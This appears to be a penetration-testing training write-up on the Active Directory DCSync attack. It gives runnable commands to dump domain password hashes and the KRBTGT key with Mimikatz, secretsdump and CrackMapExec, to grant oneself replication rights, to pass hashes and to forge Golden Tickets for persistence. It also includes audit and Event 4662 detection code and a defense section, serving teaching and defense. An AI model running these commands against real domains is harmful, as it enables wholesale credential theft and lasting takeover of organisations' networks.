DCSync Attack

advanced · 35 min · Writeup

Extracting credentials by impersonating a DC

Learning Objectives

  • Understand DCSync attack
  • Identify required permissions
  • Extract all domain hashes
  • Use DCSync for persistence

DCSync is arguably the most powerful Active Directory attack. It doesn't hack the Domain Controller; it impersonates one. By requesting password replication (a legitimate DC function), you can extract any account's password hash, including KRBTGT for Golden Tickets.

Think of it like being a new employee at a bank who has "permission to access the vault." You don't break in - you walk through the front door with credentials. The DC thinks you're another DC requesting a routine sync.

No Malware Required

DCSync uses legitimate Windows APIs. It's not a vulnerability to patch - it's how AD replication works. The "vulnerability" is having accounts with excessive replication rights.

How DCSync Works

Normal AD Replication:
1. DC1: "Hey DC2, I need password updates"
2. DC2: "Sure, here's the data" (MS-DRSR protocol)
3. DC1 receives password hashes, Kerberos keys, etc.
4. This is how all DCs stay synchronized

DCSync Attack:
1. Attacker has DCSync rights (or a compromised account that does)
2. Attacker: "Hey DC, I'm a DC and need password updates"
3. DC: "Sure, here's the data"
4. Attacker receives password hashes for any/all accounts

Key insight: The DC doesn't verify you're actually a DC.
It just checks if you have replication rights.

Required Rights

DCSync requires these rights on the domain object:
├── DS-Replication-Get-Changes (GUID: 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2)
├── DS-Replication-Get-Changes-All (GUID: 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2)
└── (Optional) DS-Replication-Get-Changes-In-Filtered-Set

Groups with DCSync rights by default:
├── Domain Admins
├── Enterprise Admins
├── Administrators
├── Domain Controllers
└── (Often) Exchange Windows Permissions ← Common escalation!

Checking for DCSync Rights

powershell
# PowerView - Find users with DCSync rights
Get-DomainObjectAcl -SearchBase "DC=corp,DC=local" -SearchScope Base -ResolveGUIDs |
    Where-Object {
        ($_.ObjectAceType -match 'DS-Replication-Get-Changes') -or
        ($_.ActiveDirectoryRights -match 'GenericAll')
    } |
    ForEach-Object {
        $sid = $_.SecurityIdentifier
        try {
            $name = Convert-SidToName $sid
            [PSCustomObject]@{
                Name   = $name
                Rights = $_.ObjectAceType
            }
        } catch {}
    }

# AD Module (loads the AD: PSDrive used by Get-Acl below)
Import-Module ActiveDirectory
(Get-Acl "AD:DC=corp,DC=local").Access |
    Where-Object { $_.ObjectType -match "1131f6a" } |   # matches both replication GUIDs
    Select-Object IdentityReference, ObjectType
bash
# Impacket - Check if current user can DCSync
secretsdump.py corp.local/user:password@dc.corp.local -just-dc-user testuser
# If it works, you have DCSync rights!

# BloodHound query
MATCH p=(n)-[:GetChanges|GetChangesAll|GenericAll]->(d:Domain)
RETURN p
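An added example (not code from the original page, PowerView or BloodHound) of the audit logic behind the checks above: given the ACEs on the domain object, which principals can actually DCSync. It applies the rule from the Required Rights section, that both Get-Changes and Get-Changes-All are needed unless the principal has GenericAll; the CORP domain, the group names and the sample ACEs are constructed.

```python
"""Audit who can DCSync from the ACEs on the domain object.

Added example, not code from the original page. The ACE list below is
constructed; in practice it comes from Get-Acl or Get-DomainObjectAcl.
"""
from collections import defaultdict

# Extended-rights GUIDs from the Required Rights list on this page.
GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
GENERIC_ALL = "GenericAll"  # covers every extended right, so both GUIDs above

# Groups this page lists as holding DCSync rights by default (constructed names).
DEFAULT_HOLDERS = {"CORP\\Domain Admins", "CORP\\Enterprise Admins",
                   "BUILTIN\\Administrators", "CORP\\Domain Controllers"}

def dcsync_capable(aces):
    """Map each DCSync-capable principal to the reason it qualifies.

    aces: iterable of (principal, "Allow"|"Deny", right) where right is an
    extended-right GUID or "GenericAll". Both replication GUIDs are needed;
    one alone is not enough. Group membership is not expanded here."""
    allowed, denied = defaultdict(set), defaultdict(set)
    for principal, access_type, right in aces:
        key = right if right == GENERIC_ALL else right.lower()
        (allowed if access_type == "Allow" else denied)[principal].add(key)
    capable = {}
    for principal, rights in allowed.items():
        effective = rights - denied[principal]  # Deny ACEs win over Allow
        if GENERIC_ALL in effective:
            capable[principal] = "GenericAll"
        elif {GET_CHANGES, GET_CHANGES_ALL} <= effective:
            capable[principal] = "Get-Changes + Get-Changes-All"
    return capable

def unexpected_holders(aces):
    """Audit findings: DCSync-capable principals outside the default groups."""
    return sorted(p for p in dcsync_capable(aces) if p not in DEFAULT_HOLDERS)

# Constructed sample ACEs (not from a real domain).
SAMPLE_ACES = [
    ("CORP\\Domain Admins", "Allow", "GenericAll"),
    ("CORP\\Domain Controllers", "Allow", GET_CHANGES),
    ("CORP\\Domain Controllers", "Allow", GET_CHANGES_ALL),
    ("CORP\\svc_backup", "Allow", GET_CHANGES),        # one right only: cannot DCSync
    ("CORP\\jdoe", "Allow", GET_CHANGES),
    ("CORP\\jdoe", "Allow", GET_CHANGES_ALL),          # both rights: finding
    ("CORP\\helpdesk", "Allow", "GenericAll"),         # GenericAll on the domain: finding
]
```

The PowerView filter above matches any ACE containing 'DS-Replication-Get-Changes', so a principal holding only one of the two rights shows up there but is correctly excluded here.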

Performing DCSync

Mimikatz

# Single user
lsadump::dcsync /user:Administrator
lsadump::dcsync /user:corp\Administrator
lsadump::dcsync /user:krbtgt    # For Golden Tickets!

# Output:
[DC] 'corp.local' will be the domain
[DC] 'DC01.corp.local' will be the DC server
[DC] 'Administrator' will be the user account
** SAM ACCOUNT **
SAM Username : Administrator
Credentials:
  Hash NTLM: a9b30e5bxxxxxxxxxxxxxxxxxxxxxxxx
    ntlm- 0: a9b30e5bxxxxxxxxxxxxxxxxxxxxxxxx
    lm  - 0: aad3b435b51404eeaad3b435b51404ee

# All users
lsadump::dcsync /all /csv

# Specific domain
lsadump::dcsync /domain:child.corp.local /user:Administrator

Impacket (secretsdump.py)

bash
# Single user
secretsdump.py corp.local/admin:password@dc.corp.local -just-dc-user Administrator
secretsdump.py corp.local/admin:password@dc.corp.local -just-dc-user krbtgt

# All users
secretsdump.py corp.local/admin:password@dc.corp.local -just-dc

# With hash (Pass-the-Hash DCSync)
secretsdump.py -hashes :HASH corp.local/admin@dc.corp.local -just-dc

# Output format:
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:a9b30e5b...:::
# krbtgt:502:aad3b435b51404eeaad3b435b51404ee:KEY_HERE...:::

CrackMapExec

bash
# Using --ntds flag
crackmapexec smb dc.corp.local -u admin -p password --ntds

# Output saved to ~/.cme/logs/

Get KRBTGT First

Always extract the KRBTGT hash during DCSync. It enables persistence: even if you lose access, Golden Tickets work until KRBTGT is reset twice.

Escalation to DCSync

Exchange Escalation

powershell
# Exchange Windows Permissions group has WriteDACL on the domain
# Any member can grant themselves DCSync rights!

# Check if user is in Exchange groups
Get-ADGroupMember "Exchange Windows Permissions" -Recursive
Get-ADGroupMember "Exchange Trusted Subsystem" -Recursive

# If you're a member, grant DCSync rights (PowerView; backtick continues the line):
Add-DomainObjectAcl -TargetIdentity "DC=corp,DC=local" -PrincipalIdentity attacker `
    -Rights DCSync -Verbose

# Now DCSync!

WriteDACL Escalation

powershell
# If you have WriteDACL on the domain object
# Grant yourself DCSync rights

# PowerView (backtick continues the line)
Add-DomainObjectAcl -TargetIdentity "DC=corp,DC=local" -PrincipalIdentity attacker `
    -Rights DCSync -Verbose

# Manual with AD module
$acl = Get-Acl "AD:DC=corp,DC=local"
$user = New-Object System.Security.Principal.NTAccount("CORP\attacker")
# Add Get-Changes and Get-Changes-All rights
# ... (complex ACE creation)
Set-Acl "AD:DC=corp,DC=local" $acl

GenericAll on Domain

# GenericAll includes WriteDACL
# Same escalation as above

# Also possible via:
# - WriteOwner (change owner, then WriteDACL)
# - Compromise a group that has these rights

Using DCSync Results

bash
# After DCSync, you have hashes for everyone

# Pass-the-Hash as Domain Admin
psexec.py -hashes :DA_HASH corp.local/Administrator@target

# Create Golden Ticket with KRBTGT
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-... -domain corp.local Administrator
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass corp.local/Administrator@dc.corp.local

# Crack hashes offline
hashcat -m 1000 hashes.txt wordlist.txt

# Kerberoast offline (you have all SPN hashes now)
# Extract from DCSync output and crack with hashcat -m 13100

Detection & Defense

Detection:
├── Event ID 4662 - Operation on directory object
│   ├── Look for: DS-Replication-Get-Changes operations
│   ├── From a non-DC source IP
│   └── Especially if the user is not in the normal replication groups
├── Network monitoring
│   ├── DRSUAPI traffic from non-DC IPs
│   └── Unusual replication patterns
└── Honey tokens
    └── Monitor for access to fake accounts with DCSync rights

Defense:
├── Minimize accounts with DCSync rights
│   └── Only Domain Controllers should have these
├── Remove Exchange's excessive permissions
│   └── Known issue since Exchange 2007
├── Protected Users group
│   └── Won't prevent DCSync but limits credential exposure
├── Monitor for ACL changes on the domain object
├── Alert on DCSync operations from non-DC sources
└── Regular audits of replication rights
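The Event ID 4662 detection described above, as an added example that is not part of the original page: it reads the Properties field of 4662 events for the two replication GUIDs from the Required Rights section and flags any principal not on an allowlist of expected replicators. The DC names, the directory-sync service account and the sample events are constructed.

```python
"""Flag DCSync-style replication requests in Windows Security event 4662.

Added example, not code from the original page. The events below are
constructed; a real pipeline would read them from the DCs' Security logs.
"""
from dataclasses import dataclass

# Replication extended-rights GUIDs from the Required Rights list on this page.
GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_GUIDS = {GET_CHANGES, GET_CHANGES_ALL}

# Principals expected to request replication. Assumed values for this example:
# the DCs' machine accounts plus one directory-synchronisation service account.
EXPECTED_REPLICATORS = {"DC01$", "DC02$", "svc_dirsync"}

@dataclass
class Event4662:
    subject_user: str   # SubjectUserName: who performed the operation
    properties: str     # Properties: access-mask text followed by the ACE GUIDs

def replication_rights_used(ev):
    """Replication GUIDs that appear in the event's Properties field."""
    props = ev.properties.lower()
    return {guid for guid in REPLICATION_GUIDS if guid in props}

def is_suspicious_dcsync(ev):
    """A replication right exercised by a principal that is not a known replicator."""
    return bool(replication_rights_used(ev)) and ev.subject_user not in EXPECTED_REPLICATORS

def triage(events):
    """(subject, sorted GUIDs) for every suspicious event, in log order."""
    return [(ev.subject_user, sorted(replication_rights_used(ev)))
            for ev in events if is_suspicious_dcsync(ev)]

# Constructed sample events (values are made up for the example).
SAMPLE_EVENTS = [
    # Routine DC-to-DC replication: expected, not flagged.
    Event4662("DC02$", "%%7688\n{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"),
    # Ordinary user exercising both replication rights: the DCSync signature.
    Event4662("jdoe", "%%7688\n{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n"
                      "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"),
    # Same user, a control-access operation on an unrelated (constructed) right: not flagged.
    Event4662("jdoe", "%%7688\n{00000000-0000-0000-0000-00000000beef}"),
]
```

4662 is only written when Directory Service Access auditing is enabled and the domain object carries a matching SACL, so confirm both before relying on this signal.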

Exchange Is Dangerous

Exchange Windows Permissions has WriteDACL on the domain by default. This is a well-known escalation path. Microsoft considers this "by design" but many organizations remove this permission.

DCSync Methodology

DCSync Attack Flow

1. Enumerate: Find users with DCSync rights
2. Escalate: If needed, exploit a path to DCSync rights
3. Extract KRBTGT: DCSync krbtgt for a Golden Ticket
4. Extract Targets: DCSync specific high-value accounts
5. Dump All: Optionally dump all hashes
6. Persist: Create a Golden Ticket with the KRBTGT hash

Knowledge Check

Quick Quiz

What rights are required for DCSync?

Challenges

DCSync the Domain

Challenge (advanced)

With Domain Admin credentials, perform DCSync to extract the KRBTGT hash and create a Golden Ticket for persistent access.


Key Takeaways

  • DCSync impersonates a DC to request password replication
  • Requires DS-Replication-Get-Changes and DS-Replication-Get-Changes-All rights on the domain object
  • Domain Admins, Enterprise Admins have these by default
  • Exchange Windows Permissions can escalate to DCSync
  • Always extract KRBTGT for Golden Ticket persistence
  • Detected via Event ID 4662 from non-DC sources